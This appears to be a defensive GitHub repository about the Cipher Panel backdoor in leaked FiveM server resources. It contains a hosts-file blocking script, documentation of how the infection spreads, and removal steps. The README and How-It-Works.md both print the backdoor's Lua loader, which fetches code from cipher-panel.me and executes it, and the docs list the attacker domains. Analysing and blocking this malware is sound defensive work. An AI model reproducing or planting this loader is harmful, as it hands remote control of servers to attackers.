├── CipherNetworkBlock.bat ├── Documentation ├── How-It-Works.md └── Infection.md └── README.md /CipherNetworkBlock.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | net.exe session 1>NUL 2>NUL || (start cmd /c "@echo off & title EndProjectCipher & mode con cols=36 lines=2 & color 0C & echo You must run this as Adminstrator & pause>nul" & EXIT) 3 | echo. 4 | echo. >> %WINDIR%\System32\drivers\etc\hosts 5 | echo [ProjectEndCipher] Blocking cipher-panel.me... 6 | echo 127.0.0.1 cipher-panel.me >> %WINDIR%\System32\drivers\etc\hosts 7 | echo [ProjectEndCipher] Blocked cipher-panel.me 8 | echo. 9 | echo [ProjectEndCipher] Blocking ciphercheats.com... 10 | echo 127.0.0.1 ciphercheats.com >> %WINDIR%\System32\drivers\etc\hosts 11 | echo [ProjectEndCipher] Blocked ciphercheats.com 12 | echo. 13 | echo [ProjectEndCipher] Blocking keyx.club... 14 | echo 127.0.0.1 keyx.club >> %WINDIR%\System32\drivers\etc\hosts 15 | echo [ProjectEndCipher] Blocked keyx.club 16 | echo. 17 | echo [ProjectEndCipher] Blocking dark-utilities.xyz... 18 | echo 127.0.0.1 dark-utilities.xyz >> %WINDIR%\System32\drivers\etc\hosts 19 | echo [ProjectEndCipher] Blocked dark-utilities.xyz 20 | echo. 21 | pause -------------------------------------------------------------------------------- /Documentation/How-It-Works.md: -------------------------------------------------------------------------------- 1 | # How Cipher Works 2 | **Cipher** works by releasing infected code/resources to the FiveM public. Server owners/developers take the code (that they don't know is infected) and install it on their servers. Once the resource is installed and ran it will inject its code into other previously clean resources. 3 | 4 | **The initial infected code boils down to the following:** 5 | 6 | ```Lua 7 | PerformHttpRequest('https://cipher-panel.me/_i/i?to=UNIQUECODE', function (e, d) 8 | local s = assert(load(d)) 9 | if (d == nil) then return end 10 | s() 11 | end) 12 | ``` 13 | 14 | The **Unique Code** in the URL request is the Cipher user that now has control of your server. Once this code is ran it downloads the remote code (from Cipher) and runs it on line 4 as a function. 15 | 16 | This is the basis on how most of Cipher works. It proceeds to download several more requests (found in the code returned by Cipher) and will continue until it injects more pre-existing resources. 17 | 18 | Read **Infection Documentation** for more information on what it expands into. -------------------------------------------------------------------------------- /Documentation/Infection.md: -------------------------------------------------------------------------------- 1 | # Infection 2 | After your server has initially been infected it will rapidly expand to other resources. 3 | 4 | We have found through printing each Cipher request that it'll modify two resources. 5 | 6 | - **Old Method:** Modifies the default __rconlog__ resource to allow remote execution. 7 | - **New Method:** Modifies __YARN__ and __Webpack__ builders. 8 | 9 | 10 | ### New Method Information: 11 | - `resources\[system]\[builders]\yarn\yarn_builder.js` 12 | - Will modify the index.js of webpack to run ``is-glob`` node module. 13 | - `resources\[system]\[builders]\webpack\node_modules\is-glob\index.js` 14 | - Modifies the ``is-glob`` node module to run remote code and infect further resources. 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

ProjectEndCipher Discord Server

2 |

3 | 4 | 5 | # Cipher Panel 6 | Cipher is a paid Remote Execution/Administration Tool (RAT). Cipher's customers generate 4 lines of Lua code to inject into resources (many of them obfuscate the code) which will download remote code from the Cipher servers. We've found many leaked resources are infected with Cipher-Panel. This repository will talk more about how Cipher works. 7 | 8 | 9 | 10 | # How Cipher Works 11 | Cipher works by releasing infected code/resources to the FiveM public. Server owners/developers take the code (that they don't know is infected) and install it on their servers. Once the resource is installed and ran it will inject its code into other previously clean resources. 12 | 13 | The initial infected code boils down to the following: 14 | 15 | ```Lua 16 | PerformHttpRequest('https://Cipher-panel.me/_i/i?to=UNIQUECODE', function (e, d) 17 | local s = assert(load(d)) 18 | if (d == nil) then return end 19 | s() 20 | end) 21 | ``` 22 | 23 | The Unique Code in the URL request is the Cipher user that now has control of your server. Once this code is run it downloads the remote code (from Cipher) and runs it on line 4 as a function. 24 | 25 | This is the basis on how most of Cipher works. It proceeds to download several more requests (found in the code returned by Cipher) and will continue until it injects more pre-existing resources. 26 | 27 | After the code is run, it will upload some javascript and override existing files within the system builders directory. 28 | 29 | `resources\[system]\[builders]` 30 | 31 | The code will start propagating itself within all of your resources and files within the FiveM server installation to make it difficult to remove. 32 | 33 | At this stage, its armageddon and all files within the server are compromised meaning files can be downloaded, uploaded, edited and viewed, including but not limited to just the server.cfg, sql credentials or even steal your cfx license keys. They’re also able to run remote code on the server which leads to the last step. 34 | 35 | Cipher is a rat that has the capability of gaining full system administrator access to take over the host machine it's run on. It does this by using powershell to download a rat executable and also add / alter users to provide remote desktop access to your server. This back door approach also supports linux too. 36 | 37 | Cipher customers have been seen attempting to extort servers for money paid in crypto currency in exchange to deter the user of Cipher from deleting the server entirely. 38 | 39 | Read Infection Documentation for more information on what it expands into. 40 | 41 | 42 | 43 | # How To Remove Cipher 44 | 45 | If you have been infected with Cipher, this is what you must do: 46 | 47 | Disconnect from the internet your server and access it via KVM (if possible). 48 | 49 | Blacklist their domains on your firewall. This will slow them down however we have seen instances where they will use proxies to evade this but on most leaks this will help. 50 | 51 | Edit the hosts file `C://windows/system32/drivers/etc/hosts` and add. 52 | 53 | ``` 54 | 127.0.0.1 cipher-panel.me 55 | 127.0.0.1 ciphercheats.com 56 | 127.0.0.1 keyx.club 57 | 127.0.0.1 dark-utilities.xyz 58 | ``` 59 | 60 | Install an antivirus software on the host machine to scan for any backdoors / RATs. 61 | 62 | Check the system admins on the machine to verify that no unauthorized accounts exist. 63 | 64 | Change any passwords you have on the host machine to ensure that they don’t have access. 65 | 66 | While your FiveM server is turned off, use the provided Python script to install a nullifier which will help prevent future infections of Cipher and tell you what files are infected. 67 | 68 | You can also install this code manually however we expect Cipher will attempt to patch this. 69 | 70 | scheduler.lua 71 | 72 | 73 | **Make sure you do not run your FiveM server as ROOT (Linux) or Administrator (Windows)** 74 | 75 | 76 | 77 | # Other things you can do to prevent being attacked by Cipher 78 | 79 | Consider adding the [Warden](https://discord.com/invite/jeFeDRasfs) to your discord server. Warden is a great resource that can help remove cheaters and leakers (people who participate in sharing leaked paid resources) from your community or support hack products like Cipher. 80 | 81 | Make sure to install the latest updates of whatever framework you are using for 82 | 83 | [ESX](https://github.com/esx-framework/esx-legacy) | [ESX Discord](https://discord.esx-framework.org) 84 | 85 | [QBCore](https://github.com/qbcore-framework/qb-core) | [QBCore Discord](https://discord.gg/qbcore) 86 | 87 | Consider investing in a good anticheat for your server like [Phoenix Anticheat](https://discord.com/invite/pac) or [FiveEye](https://dsc.gg/FiveEye) or any other anti-cheat that you feel comfortable using. (Currently we are working with multiple anticheat providers to patch Cipher. The progress made will be shown here.) 88 | 89 | Buy resources from only reputable places that you feel comfortable purchasing from either Tebex listed stores or from places like [Modit](https://modit.store/), if you're unsure about a store, perhaps ask for guidance on the warden discord. 90 | 91 | Be extremely sketchy on code you get that is encrypted or downloaded from shady sources. 92 | 93 | Lastly, the most important thing… DON'T USE LEAKED RESOURCES! 94 | 95 | 96 | ## Cipher Customers 97 | 98 | If you are a customer of Cipher, we suggest canceling your subscriptions and getting a refund. 99 | --------------------------------------------------------------------------------